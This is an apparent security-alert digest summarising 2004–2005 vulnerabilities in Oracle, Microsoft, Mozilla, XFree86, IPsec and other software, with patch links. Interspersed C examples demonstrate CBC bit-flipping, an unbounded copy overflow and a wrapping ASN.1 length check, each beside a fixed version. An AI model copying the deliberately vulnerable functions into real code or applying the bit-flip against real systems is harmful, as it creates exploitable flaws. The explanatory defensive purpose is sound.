execution of arbitrary code or commands, information disclosure, and denial of service. 
An attacker who compromises an Oracle database may be able to gain access to sensitive information.

Overview

The Critical Patch Update provides information about affected components, access and authorization 
required, and the impact of the  vulnerabilities on data confidentiality, integrity, and availability. 
For more information on terms used in the Critical Patch Update, Metalink customers should refer to
MetaLink Note 293956.1.

According to the Critical Patch Update: "The new database vulnerabilities addressed by this Critical Patch Update do not affect Oracle database Client-only installations (installations that do not have the Oracle Database Server installed). Therefore, it is not necessary to apply this Critical Patch Update to client-only installations if a prior Critical Patch Update, or Alert 68, has already been applied to the client-only installations."

US-CERT recommends that sites running Oracle review the Critical Patch Update, apply patches, and take other mitigating action as appropriate. US-CERT is tracking all of these issues under VU#210524 and will publish individual Vulnerability Notes as further information becomes available.

Note that according to public reports, the patches included in this update, as well as previous updates, may not adequately correct all of the security issues.

For details see:
http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html

Patches

http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html



Thunderbird Command Line URL Shell Command Injection

2005-10-03

Risk level: critical

Type: remote system compromise

Source of info: Peter Zelezny

Impact

A remote, unauthenticated attacker may be able to execute arbitrary commands with the privileges of the user of the application which invoked the vulnerable shell script.

Overview

The vulnerability is caused by the shell script used to launch Thunderbird, which lets the shell evaluate commands enclosed in backticks inside the URL passed on the command line. This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link with the "mailto:" URI handler in an external application that uses Thunderbird as the default mail reader (e.g. Firefox on Fedora Core 4).

For additional information see:
https://bugzilla.mozilla.org/show_bug.cgi?id=307185
http://secunia.com/advisories/16869/
http://secunia.com/advisories/16846/
http://secunia.com/advisories/16901/

Patches

http://www.mozilla.org/products/thunderbird/



Microsoft Security Bulletin Summary for August 2005

2005-08-10

Risk level: critical

Type: many types

Source of info: Microsoft Security Team

Impact

Microsoft has released the Security Bulletin Summary for August 2005. The summary lists six vulnerabilities. Three of them are critical and allow remote code execution, one is important and the other two are moderate.

Overview

For more details see:
 http://go.microsoft.com/fwlink/?LinkId=51160

Patches

See: http://go.microsoft.com/fwlink/?LinkId=51160



Microsoft Windows, Internet Explorer, Word and Remote Desktop Vulnerabilities

2005-07-19

Risk level: critical

Type: remote system compromise

Source of info: Microsoft Security Team

Impact

A few days ago Microsoft released updates that address critical vulnerabilities in Windows, Office and Internet Explorer. Exploitation of these three vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code on an affected system.

Separately, Microsoft has published information about an unpatched vulnerability in Remote Desktop Protocol (RDP) that could lead to a denial of service.

Overview

More information about critical updates can be found in Microsoft Security Bulletin Summary for July, 2005: http://www.microsoft.com/technet/security/bulletin/ms05-jul.mspx

Information on the denial-of-service attack against Remote Desktop Protocol can be found in Microsoft Security Advisory (904797):
http://www.microsoft.com/technet/security/advisory/904797.mspx

Patches

To patch the first three vulnerabilities see:
http://www.microsoft.com/technet/security/bulletin/ms05-jul.mspx
For the RDP issue see the workarounds in:
http://www.microsoft.com/technet/security/advisory/904797.mspx
and use Windows Update.



Critical bug in Windows - a COM Object (Javaprxy.dll) contains an unspecified vulnerability

2005-07-04

Risk level: critical

Type: Remote code execution

Source of info: sec-consult

Impact

The JVIEW Profiler COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system.

Overview

More information can be found at:

http://www.sec-consult.com/184.html
http://www.kb.cert.org/vuls/id/939605
http://www.microsoft.com/technet/security/advisory/903144.mspx
http://secunia.com/advisories/15891/
http://www.securitytracker.com/alerts/2005/Jun/1014329.html
http://www.osvdb.org/displayvuln.php?osvdb_id=17680

Patches

unpatched



Vulnerability in Windows' Server Message Block

2005-06-17

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

A remote code execution vulnerability exists in Server Message Block (SMB) that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system.

Overview

Because of the nature of this issue, attempts to exploit this vulnerability would most likely result in a denial of service.

Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. By default, the Windows Firewall that is provided as part of Windows XP Service Pack 2 and Windows Server 2003 blocks the affected ports from responding to network-based attempts to exploit this vulnerability. 

For more details see:
http://www.microsoft.com/technet/security/bulletin/MS05-027.mspx

Patches

http://www.microsoft.com/technet/security/bulletin/MS05-027.mspx



Cumulative Security Update for Internet Explorer

2005-06-17

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Two critical vulnerabilities have been found in Internet Explorer 5.01, 5.5 and 6. One of them allows remote code execution and the other can lead to information disclosure.

Overview

According to Microsoft Security Bulletin MS05-025:
1) A remote code execution vulnerability exists in Internet Explorer because of the way that it handles PNG images. An attacker could exploit the vulnerability by constructing a malicious PNG image that could potentially allow remote code execution if a user visited a malicious Web site or viewed a malicious e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.

2) An information disclosure vulnerability exists in Internet Explorer because of the way that it handles certain requests to display XML content. An attacker could exploit the vulnerability by constructing a malicious Web page that could potentially lead to information disclosure if a user visited a malicious Web site or viewed a malicious e-mail message. An attacker who successfully exploited this vulnerability could read XML data from another Internet Explorer domain. However, user interaction is required to exploit this vulnerability.

For details see:
http://www.microsoft.com/technet/security/Bulletin/MS05-025.mspx

Patches

http://www.microsoft.com/technet/security/Bulletin/MS05-025.mspx



Remote Buffer overflow in WebSphere Application Server Console

2005-06-08

Risk level: high

Type: Buffer overflow

Source of info: Application Security, Inc.

Impact

Remote execution of arbitrary code by an unauthenticated user is possible. The code would run in the context of the server process.

Overview

There is a Unicode buffer overflow in the WebSphere Application Server Administrative Console. The security vulnerability exists in the authentication mechanism. The default TCP ports where this vulnerability can be exploited include 9080 (HTTP), 9090 (HTTP) and 9043 (HTTPS). The authentication process takes place only when the 'global security option' is enabled in the server; the vulnerability cannot be exploited if the security option is disabled.

For details see Application Security, Inc advisory:
http://www.appsecinc.com/resources/alerts/general/WEBSPHERE-001.html

Patches

http://www-1.ibm.com/support/docview.wss?rs=180&uid=swg24009775



Critical vulnerabilities in HP-UX

2005-05-27

Risk level: high

Type: many types

Source of info: HP Software Security Response Team

Impact

The Hewlett-Packard Software Security Response Team has reported three critical vulnerabilities. Two of them could be exploited remotely by an unauthorized user to cause a Denial of Service (DoS) and one could be exploited to gain remote unauthorized access.

Overview

More detailed information about the issues can be found in HP Security Bulletins HPSBUX01165, HPSBUX01164 and HPSBUX01137. See:
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01165
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01164
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01137

Patches

http://itrc.hp.com



Linux kernel pktcdvd ioctl break user space limit

2005-05-19

Risk level: medium

Type: Elevation of privilege

Source of info: Xfocus

Impact

A locally exploitable flaw in the Linux pktcdvd block device ioctl handler allows local users to gain root privileges and execute arbitrary code at kernel privilege level.

Overview

The Linux kernel contains the pktcdvd block device component. Because the pktcdvd ioctl handler does not validate its user-supplied parameter, a process can break out of the user-space limit and execute arbitrary code at kernel privilege level.

See also:
http://secunia.com/advisories/15392/
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.11.10

Patches

http://www.kernel.org/



Vulnerability Issues with IPsec Configurations

2005-05-10

Risk level: medium

Type: Information leakage

Source of info: NISCC UK

Impact

An unauthenticated remote attacker that is able to intercept and modify IPsec (and ICMP, for some scenarios) communications between security gateways may be able to recover plaintext of the IPsec communications between them.

Overview

Within the IPsec suite, the Encapsulating Security Payload (ESP) protocol provides confidentiality 
for packets by applying encryption algorithms to the packets, along with several other services. 
The Authentication Header (AH) protocol can be used to complement the ESP functionality with 
integrity protection. Both the ESP and AH protocols can be used in either "Transport" or 
"Tunneling" mode. When Cipher Block Chaining (CBC) encryption, which has a well-known set of flaws 
allowing bit-flipping attacks, is used by ESP in tunneling mode to provide confidentiality 
guarantees without proper integrity protection for inner (tunneled) packets, attackers may be able to 
perform the following attacks:

      Destination Address Rewriting: The destination IP address of the inner, encrypted packet is modified in a bit-flipping attack. Intermediate gateways may then route the inner packet to the modified destination address once the inner packet is recovered.

      IP Options modification: The header length and source address of the inner packet is modified 
by performing a bit-flipping attack on the outer payload. Once the modified inner packet is 
recovered, the structure of the packet may be affected in such a manner that an Internet Control 
Message Protocol (ICMP) Parameter Problem message is generated and sent to the source address of the 
inner packet along with the plaintext payload. This may be intercepted, leading to a recovery of 
the original inner packet plaintext payload.

      Protocol Field modification: In a similar manner to the IP Options modification attack, the 
protocol field and source address of the inner packet are modified in a bit-flipping attack 
against the outer packet payload. An invalid or unusable value in the protocol field may then 
cause a system which is processing a recovered inner packet to generate an ICMP Protocol 
Unreachable message. This ICMP message is then sent back to the (modified) source address with 
the plaintext payload of the inner packet, which may be intercepted in order to recover the 
plaintext.
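
The following is an added example, not from the NISCC advisory or from any IPsec implementation, of the CBC bit-flipping step that all three attacks above rely on, run against a constructed inner IPv4 packet. The cipher is a toy 64-bit keyed permutation, an assumption made so that the example needs no crypto library; the malleability comes from the chaining mode and not from the cipher, so DES, 3DES or AES in CBC mode behave the same way. Block size, packet layout, addresses, key and IV are all constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added example; toy cipher, constructed packet, not production code. */

#define BLOCK 8          /* 64-bit blocks, as in the DES/3DES-CBC suites of the time */
#define PKT_LEN 24       /* 20-byte inner IPv4 header + 4-byte payload = 3 blocks */
#define DST_OFFSET 16    /* destination address: bytes 16..19 of the inner header */

static uint64_t load64(const uint8_t *p)
{
    uint64_t x = 0;
    for (int i = 0; i < 8; i++) x = (x << 8) | p[i];
    return x;
}

static void store64(uint8_t *p, uint64_t x)
{
    for (int i = 7; i >= 0; i--) { p[i] = (uint8_t)x; x >>= 8; }
}

/* Toy keyed permutation standing in for the block cipher. */
static uint64_t toy_encrypt(uint64_t key, uint64_t b)
{
    uint64_t x = b ^ key;
    x = (x << 13) | (x >> 51);
    return x ^ 0x9E3779B97F4A7C15ULL;
}

static uint64_t toy_decrypt(uint64_t key, uint64_t c)
{
    uint64_t x = c ^ 0x9E3779B97F4A7C15ULL;
    x = (x >> 13) | (x << 51);
    return x ^ key;
}

void cbc_encrypt(uint64_t key, const uint8_t iv[8], const uint8_t *pt, uint8_t *ct, size_t len)
{
    uint64_t prev = load64(iv);
    for (size_t i = 0; i < len; i += BLOCK) {
        prev = toy_encrypt(key, load64(pt + i) ^ prev);
        store64(ct + i, prev);
    }
}

void cbc_decrypt(uint64_t key, const uint8_t iv[8], const uint8_t *ct, uint8_t *pt, size_t len)
{
    uint64_t prev = load64(iv);
    for (size_t i = 0; i < len; i += BLOCK) {
        uint64_t c = load64(ct + i);
        store64(pt + i, toy_decrypt(key, c) ^ prev);   /* P[i] = D(C[i]) ^ C[i-1] */
        prev = c;
    }
}

/* Standard IPv4 header checksum. Over a header whose checksum field is
 * filled in, the result is 0 exactly when the header is intact. */
uint16_t ip_checksum(const uint8_t *hdr)
{
    uint32_t s = 0;
    for (int i = 0; i < 20; i += 2) s += (uint32_t)(hdr[i] << 8 | hdr[i + 1]);
    while (s >> 16) s = (s & 0xFFFF) + (s >> 16);
    return (uint16_t)~s;
}

/* Constructed inner packet: IPv4, TTL 64, protocol 17, payload "ping". */
void build_inner_packet(uint8_t out[PKT_LEN], const uint8_t src[4], const uint8_t dst[4])
{
    static const uint8_t fixed[12] = {0x45, 0x00, 0x00, PKT_LEN, 0x12, 0x34, 0x40, 0x00, 64, 17, 0x00, 0x00};
    uint16_t ck;
    memcpy(out, fixed, 12);
    memcpy(out + 12, src, 4);
    memcpy(out + 16, dst, 4);
    ck = ip_checksum(out);
    out[10] = (uint8_t)(ck >> 8);
    out[11] = (uint8_t)ck;
    memcpy(out + 20, "ping", 4);
}

/* The attacker's edit, on ciphertext only: XORing a mask into ciphertext
 * block i-1 XORs the same mask into plaintext block i at the same byte
 * offset and turns plaintext block i-1 (here TTL/protocol/checksum/source)
 * into garbage. A real cipher scrambles that whole block; the toy cipher
 * only moves the touched bits, which is still enough to see what is hit. */
void rewrite_destination(uint8_t *ct, const uint8_t old_dst[4], const uint8_t new_dst[4])
{
    size_t pos = DST_OFFSET - BLOCK;
    for (int i = 0; i < 4; i++) ct[pos + i] ^= old_dst[i] ^ new_dst[i];
}

/* Encrypt a packet 10.0.0.1 -> 10.0.0.2, rewrite the ciphertext so the
 * tunnel decrypts it to 192.0.2.99, and report what the gateway sees.
 * Returns 1 if the destination was rewritten; *src_changed and
 * *checksum_ok describe the collateral damage to the previous block. */
int attack_demo(int *src_changed, int *checksum_ok)
{
    static const uint8_t src[4] = {10, 0, 0, 1}, dst[4] = {10, 0, 0, 2}, evil[4] = {192, 0, 2, 99};
    static const uint8_t iv[8] = {0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA};
    const uint64_t key = 0x0101010101010101ULL;
    uint8_t pkt[PKT_LEN], ct[PKT_LEN], out[PKT_LEN];

    build_inner_packet(pkt, src, dst);
    cbc_encrypt(key, iv, pkt, ct, PKT_LEN);
    rewrite_destination(ct, dst, evil);
    cbc_decrypt(key, iv, ct, out, PKT_LEN);

    *src_changed = memcmp(out + 12, pkt + 12, 4) != 0;
    *checksum_ok = ip_checksum(out) == 0;
    return memcmp(out + DST_OFFSET, evil, 4) == 0;
}
```

The run shows both halves of the problem: the destination comes out as 192.0.2.99 without the attacker knowing the key, and the preceding block (including the header checksum) is corrupted, which is why the attacks above need the receiving gateway to be tolerant or need the IV to be the block that is flipped. The defence is integrity protection over the ciphertext (AH, or ESP with authentication), which rejects the modified packet before it is ever decrypted.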

For further details see:
http://www.niscc.gov.uk/niscc/docs/re-20050509-00385.pdf?lang=en
http://jvn.jp/niscc/NISCC-004033/index.html
http://www.ietf.org/ids.by.wg/ipsec.html

Patches

See vendor specific solutions at your vendor's website.



New cvs packages for Debian fix unauthorised repository access

2005-04-28

Risk level: high

Type: remote system compromise

Source of info: Debian Security Team

Impact

Remotely exploitable bugs in the Concurrent Versions System (CVS) server have been discovered.

Overview

According to the Debian Security Advisory:
Maks Polunin and Alberto Garcia discovered independently that, when the pserver access method is used in combination with the repouid patch that Debian applies, it is possible to bypass the password and gain access to the repository in question (CAN-2004-1342).

Moreover, Alberto Garcia discovered that a remote user can cause the cvs server to crash when the 
cvs-repouids file exists but does not contain a mapping for the current repository, which can be 
used as a denial of service attack.

Patches

For details see:
http://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00097.html



Multiple flaws in Oracle Database Server

2005-04-27

Risk level: high

Type: many types

Source of info: NGSSoftware Insight Security

Impact

Potential consequences may include the remote execution of arbitrary code, disclosure of sensitive information, and denial-of-service conditions. Database compromises may result in the disclosure of sensitive personal information, such as credit card numbers, social security numbers, and health and patient information.

Overview

David Litchfield of NGSSoftware has discovered multiple high risk vulnerabilities in Oracle's Database Server. Versions affected include:

Oracle Database 10g Release 1 Version 10.1.0.2, 10.1.0.3, 10.1.0.3.1 and 10.1.0.4
Oracle9i Database Server Release 2, versions 9.2.0.5 and 9.2.0.6
Oracle9i Database Server Release 1, versions 9.0.1.4, 9.0.1.5 and 9.0.4
Oracle8i Database Server Release 3, version 8.1.7.4

NGSSoftware are going to withhold details about these flaws for three months. Full details will be published on the Tuesday, 12th of July 2005. This three month window will allow Oracle database administrators the time needed to test and apply the patch set before the details are released to the general public. This reflects NGSSoftware's new approach to responsible disclosure. 

NGSSQuirreL for Oracle, NGSSoftware's advanced vulnerability assessment scanner and security manager for Oracle, has been updated to check for and positively identify these flaws in Oracle database servers on the network. More information about NGSSQuirreL for Oracle can be found at http://www.ngssoftware.com/squirrelora.htm. 

Patches

http://www.oracle.com/technology/deploy/security/pdf/cpuapr2005.pdf
http://metalink.oracle.com/



sendfile() system call - kernel memory disclosure

2005-04-20

Risk level: medium

Type: Buffer overflow

Source of info: FreeBSD Project Team

Impact

A local user could create a large file and truncate it while transferring it to himself, thus obtaining a copy of portions of system memory to which he would normally not have access. Such memory might contain sensitive information.

Overview

The sendfile(2) system call allows a server application (such as an HTTP or FTP server) to transmit the contents of a file over a network connection without first copying it to application memory. High performance servers such as Apache and ftpd use sendfile.

If the file being transmitted is truncated after the transfer has started but before it completes, 
sendfile(2) will transfer the contents of more or less random portions of kernel memory in lieu of the
missing part of the file.

Patches

For patches see:
ftp://ftp.freebsd.org/pub/CERT/advisories/FreeBSD-SA-05:02.sendfile.asc



Bug in Mozilla Firefox - remote code execution

2005-04-15

Risk level: high

Type: Remote code execution

Source of info: Kohei Yoshino

Impact

According to information provided by Kohei Yoshino and published in Mozilla Foundation Security Advisory 2005-39 and the US-CERT VU#519317 announcement, a remote attacker may be able to install malicious code on or read protected information from a vulnerable system.

Overview

Sites can use the _search target to open links in the Firefox sidebar. Two missing security checks allow malicious scripts to first open a privileged page (such as about:config) and then inject script using a javascript: URL. This could be used to install malicious code or steal data without user interaction.

Patches

These bugs are fixed in Firefox 1.0.3:
http://www.mozilla.org/products/firefox/all.html



Remotely exploitable bug in XFree86

2004-02-15

Risk level: high

Type: Buffer overflow

Source of info: iDEFENSE Labs

Impact

Exploitation of a buffer overflow in The XFree86 X Window System allows local attackers to gain root privileges.  

Overview

Greg MacManus, of iDEFENSE Labs, reports finding several potentially exploitable buffer overflows in XFree86's font code. David Dawes provided a patch to fix these, and other, errors.

The vulnerability specifically exists in the use of the CopyISOLatin1Lowered() function with the font_name buffer. While parsing a font.alias file, the ReadFontAlias() function uses the
length of the input string as the limit for the copy, instead of the size of the storage buffer. A malicious user may craft a malformed font.alias file, causing a buffer overflow upon parsing and eventually leading to the execution of arbitrary code.
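
An added example of the pattern described above, not XFree86's code: an alias name from a font.alias line is lower-cased while being copied into a fixed-size field, once with the input length as the limit and once with the destination size. FONT_NAME_MAX and the function names are assumptions; the overrun is demonstrated inside one larger array so that it stays in defined memory.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Added example of the bug pattern, not XFree86's code. */

#define FONT_NAME_MAX 32   /* assumed size of the font_name field */

/* Buggy: the copy limit is the length of the input, so a name longer
 * than the field writes past it. */
void copy_lowered_unbounded(char *dst, const char *src)
{
    size_t len = strlen(src);              /* the wrong limit */
    for (size_t i = 0; i < len; i++)
        dst[i] = (char)tolower((unsigned char)src[i]);
    dst[len] = '\0';
}

/* Fixed: the limit is the size of the destination. Returns 1 on success,
 * 0 (with an empty string in dst) when the name does not fit, so the
 * caller can reject the font.alias entry instead of truncating silently. */
int copy_lowered_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t len = strlen(src);
    if (dstsz == 0)
        return 0;
    if (len >= dstsz) {
        dst[0] = '\0';
        return 0;
    }
    for (size_t i = 0; i < len; i++)
        dst[i] = (char)tolower((unsigned char)src[i]);
    dst[len] = '\0';
    return 1;
}

/* Demonstrate the overrun inside defined memory: the field is the first
 * FONT_NAME_MAX bytes of a larger array and the rest is a canary.
 * Builds an alias of n 'A's and returns how many canary bytes the buggy
 * copy clobbered (0 means the name fit). */
size_t overrun_for_length(size_t n)
{
    char arena[FONT_NAME_MAX + 128];
    char alias[96];
    size_t hit = 0;

    if (n >= sizeof alias)
        return 0;
    memset(alias, 'A', n);
    alias[n] = '\0';
    memset(arena, 'C', sizeof arena);
    copy_lowered_unbounded(arena, alias);  /* dst is the 32-byte field */
    for (size_t i = FONT_NAME_MAX; i < sizeof arena; i++)
        if (arena[i] != 'C')
            hit++;
    return hit;
}
```

A 31-character alias fits; a 32-character one already clobbers one byte (the terminator), and a 50-character one overwrites 19 bytes beyond the field. In the real layout those bytes are whatever follows font_name on the stack or heap, which is what turns a malformed font.alias file into code execution.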

Successful exploitation requires that an attacker be able to execute commands in the X11 subsystem. This can be done either by having console access to the target or through a remote exploit against any X client program such as a web-browser, mail-reader or game. Successful
exploitation yields root access.

iDEFENSE has confirmed the existence of this vulnerability in XFree86 versions 4.1.0 to the current version 4.3.0. It is suspected that
earlier versions are vulnerable as well. 

Patches

ftp://ftp.xfree86.org/pub/XFree86/4.3.0/fixes/fontfile.diff 



SGI has released security update #10 for Altix systems

2004-02-15

Risk level: medium

Type: many types

Source of info: CERT

Impact

SGI has released Patch 10050: SGI Advanced Linux Environment security update #10, which includes updated RPMs for SGI ProPack v2.3 for the SGI
Altix family of systems.

Overview

The patch has been released in response to the following security issues:
-Updated slocate packages fix vulnerabilities
 http://rhn.redhat.com/errata/RHSA-2004-041.html
-Updated util-linux packages fix information  leak
 http://rhn.redhat.com/errata/RHSA-2004-056.html
-Updated mc packages resolve buffer overflow vulnerability
 http://rhn.redhat.com/errata/RHSA-2004-035.html
-Updated NetPBM packages fix multiple temporary file vulnerabilities
 http://rhn.redhat.com/errata/RHSA-2004-031.html
-Updated Gaim packages fix security vulnerabilities
 http://rhn.redhat.com/errata/RHSA-2004-045.html
-Updated mailman packages close DoS vulnerability
 http://rhn.redhat.com/errata/RHSA-2004-019.html

Patches

Patch 10050 is available from 
http://support.sgi.com/ and
ftp://patches.sgi.com/support/free/security/patches/ProPack/2.3/
The individual RPMs from Patch 10050 are available from:
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS



Remote crash in Mutt

2004-02-14

Risk level: high

Type: remote crash

Source of info: Mandrake Security Team

Impact

A bug in mutt was reported by Niels Heinen that could allow a remote attacker to send a carefully crafted mail message that causes mutt to segfault and possibly execute arbitrary code as the user running mutt.

Overview

Mutt is a text mode mail user agent. Mutt supports color, threading, arbitrary key remapping, and a lot of customization.

It was discovered that certain messages would cause mutt to crash. Mutt 1.4.2 fixes this bug.

Patches

For Mandrake packages use a suitable mirror
from the list on:
http://www.mandrakesecure.net/en/ftp.php
And install updated packages:
 Updated Packages:
  
 Corporate Server 2.1:
 9bc44748af1cb08ab42af19ae66b2bd3  corporate/2.1/RPMS/mutt-1.4.1i-1.2.C21mdk.i586.rpm
 4988bcd3dfada99b7aba26f65662c0c0  corporate/2.1/SRPMS/mutt-1.4.1i-1.2.C21mdk.src.rpm

 Corporate Server 2.1/x86_64:
 9ad9b5c92a2af1e7a9ecb4f4dbadfd3f  x86_64/corporate/2.1/RPMS/mutt-1.4.1i-1.2.C21mdk.x86_64.rpm
 4988bcd3dfada99b7aba26f65662c0c0  x86_64/corporate/2.1/SRPMS/mutt-1.4.1i-1.2.C21mdk.src.rpm

 Mandrake Linux 9.1:
 bd20ea8a4ed852602e269e1ec637e822  9.1/RPMS/mutt-1.4.1i-1.2.91mdk.i586.rpm
 4bfe4f092a63e96ada255bfc6e5a4c0e  9.1/SRPMS/mutt-1.4.1i-1.2.91mdk.src.rpm

 Mandrake Linux 9.1/PPC:
 ab9886dbc9a906669c2827bf1b0f51e7  ppc/9.1/RPMS/mutt-1.4.1i-1.2.91mdk.ppc.rpm
 4bfe4f092a63e96ada255bfc6e5a4c0e  ppc/9.1/SRPMS/mutt-1.4.1i-1.2.91mdk.src.rpm

 Mandrake Linux 9.2:
 6e3c3843611f49a20894f1cb0c64c760  9.2/RPMS/mutt-1.4.1i-3.1.92mdk.i586.rpm
 7a38e74fb7e1b11f1add65ac8f5a1e2a  9.2/SRPMS/mutt-1.4.1i-3.1.92mdk.src.rpm

 Mandrake Linux 9.2/AMD64:
 a3aa8bcdd20b8fb56c366818a10f3a9d  amd64/9.2/RPMS/mutt-1.4.1i-3.1.92mdk.amd64.rpm
 7a38e74fb7e1b11f1add65ac8f5a1e2a  amd64/9.2/SRPMS/mutt-1.4.1i-3.1.92mdk.src.rpm



Multiple Vulnerabilities in Microsoft ASN.1 Library

2004-02-11

Risk level: critical

Type: many types

Source of info: CERT

Impact

An unauthenticated, remote attacker could execute arbitrary code with the privileges of the process using the ASN.1 library. In the case of most server and authentication applications, an attacker could gain SYSTEM privileges.

Overview

Multiple integer overflow vulnerabilities in the Microsoft Windows ASN.1 parser library could allow an unauthenticated, remote attacker to execute arbitrary code with SYSTEM privileges.

Microsoft Security Bulletin MS04-007 announces a patch for multiple vulnerabilities in the Microsoft Windows ASN.1 library (msasn1.dll). According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic.

Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (X.509), Kerberos, NTLMv2, SSL, and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library.

Patch your system as soon as possible.
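
An added example, not Microsoft's ASN.1 code, of the integer-arithmetic mistake this class of bug is built on: sizing a BER/DER element from its length field, once with the 32-bit addition that wraps and once with the checks that prevent it. The function names and the two sample encodings are constructed.

```c
#include <stddef.h>
#include <stdint.h>

/* Added example of the bug class, not Microsoft's parser. */

/* Decode a definite-form BER length at buf[0]. Stores the content length
 * in *len and returns the number of length bytes consumed, or 0 for
 * malformed input (indefinite form, more than 4 length bytes, truncated). */
static size_t ber_length(const uint8_t *buf, size_t avail, uint32_t *len)
{
    size_t n, i;
    uint32_t v = 0;

    if (avail < 1)
        return 0;
    if (buf[0] < 0x80) {            /* short form */
        *len = buf[0];
        return 1;
    }
    n = buf[0] & 0x7F;              /* long form: n following length bytes */
    if (n == 0 || n > 4 || avail < 1 + n)
        return 0;
    for (i = 0; i < n; i++)
        v = (v << 8) | buf[1 + i];
    *len = v;
    return 1 + n;
}

/* Vulnerable sizing: tag + length bytes + content, added in 32 bits.
 * A content length near 2^32 wraps the sum to a tiny number, so a
 * later "total <= available" check passes and the copy that follows
 * runs far past the buffer. */
uint32_t tlv_size_unsafe(const uint8_t *buf, size_t avail)
{
    uint32_t len;
    size_t used;

    if (avail < 2)
        return 0;
    used = ber_length(buf + 1, avail - 1, &len);
    if (!used)
        return 0;
    return (uint32_t)(1 + used) + len;         /* can wrap */
}

/* Hardened sizing: never form the sum; compare the content length
 * against the space that remains after the header instead. Returns the
 * total size, or 0 when the element does not fit in avail bytes. */
size_t tlv_size_safe(const uint8_t *buf, size_t avail)
{
    uint32_t len;
    size_t used, hdr;

    if (avail < 2)
        return 0;
    used = ber_length(buf + 1, avail - 1, &len);
    if (!used)
        return 0;
    hdr = 1 + used;                            /* ber_length guarantees hdr <= avail */
    if (len > avail - hdr)
        return 0;
    return hdr + len;
}

/* Constructed inputs: a well-formed SEQUENCE { INTEGER 5 }, and a SEQUENCE
 * whose 4-byte length field claims 0xFFFFFFFF bytes of content. */
const uint8_t SAMPLE_GOOD[] = {0x30, 0x03, 0x02, 0x01, 0x05};
const uint8_t SAMPLE_EVIL[] = {0x30, 0x84, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00};
```

For SAMPLE_EVIL the unsafe version computes 6 + 0xFFFFFFFF, which wraps to 5 and looks like a perfectly small element; the safe version rejects it because 0xFFFFFFFF bytes cannot fit in the 2 bytes that remain. The general rule is to compare lengths against remaining space rather than adding them to offsets.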

Patches

Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007:
http://microsoft.com/technet/security/bulletin/MS04-007.asp



Internet Explorer/Outlook double null character DoS

2004-02-11

Risk level: medium

Type: DoS

Source of info: ACROS Security

Impact

For some web servers, two null (%00) characters appended after the host
name cause Internet Explorer or Outlook to consume 100% CPU and freeze.
This issue can be  exploited by forcing the user's browser to open a
hostile URL, either by  setting up a malicious web site and luring the
user into visiting it or sending a malicious HTML e-mail to a user using
Outlook. Once Internet  Explorer or Outlook is frozen, the user must kill
iexplore.exe or outlook.exe process respectively via task manager in order
to resume normal IE/Outlook use.


Overview

There's probably some flawed assumption in the code responsible for
parsing the requested URL, specifically in parsing the host name, that
leads to a dead loop consuming 100% CPU. This issue, however, does not
seem to occur with all host names. Furthermore, we discovered that the
sensitivity to double-null suffix obviously depends on the "Do not save
encrypted pages to disk" option being turned off (which is default).

As far as Outlook is concerned, its susceptibility to this issue is not
surprising, as Outlook is using Internet Explorer's browser object for
rendering HTML e-mail. Outlook 2003 by default prevents remote HTML images
from being displayed due to privacy reasons, which effectively prevents an
e-mail borne attack unless the sender is listed in "safe senders" list.

Our tests have shown that the computer under attack must be connected to
Internet (directly, not via http proxy) in order for this issue to occur.

Finally, once IE or Outlook is frozen, Windows Explorer often freezes as
well, possibly due to calling the same piece of code that is caught in an
endless loop.


Patches

An official patch, MS04-004, has been released which fixes this issue:
http://www.microsoft.com/technet/security/bulletin/ms04-004.asp





Possible unauthorized access to Check Point Firewall-1

2004-02-06

Risk level: high

Type: security features compromise

Source of info: CERT

Impact

Several versions of Check Point Firewall-1 contain a vulnerability that allows remote attackers to execute arbitrary code with administrative privileges, typically "SYSTEM" or "root". This allows the attacker to take control of the firewall and, in some cases, also the server it runs on. Failed attempts to exploit this vulnerability may cause the firewall to crash.

Overview

The Application Intelligence (AI) component of Check Point Firewall-1 is an application proxy that scans traffic for application layer attacks once it has passed through the firewall at the network level. Earlier versions of Firewall-1 include the HTTP Security Server, which provides similar functionality.

Both the AI and HTTP Security Server features contain an HTTP parsing vulnerability that is triggered by sending an invalid HTTP request through the firewall. When Firewall-1 generates an error message in response to the invalid request, a portion of the input supplied by the attacker is included in the format string for a call to sprintf().

Researchers at Internet Security Systems have determined that it is possible to exploit this format string vulnerability to execute commands on the firewall. The researchers have also determined that this vulnerability can be exploited as a heap overflow, which would allow an attacker to execute arbitrary code. In either case, the commands or code executed by the attacker would run with administrative privileges, typically "SYSTEM" or "root". For more information, please see the ISS advisory at:
http://xforce.iss.net/xforce/alerts/id/162

Check Point has published a "Firewall-1 HTTP Security Server Update" that modifies the error return strings used when an invalid HTTP request is detected. For more information, please see the Check Point bulletin at:
http://www.checkpoint.com/techsupport/alerts/security_server.html
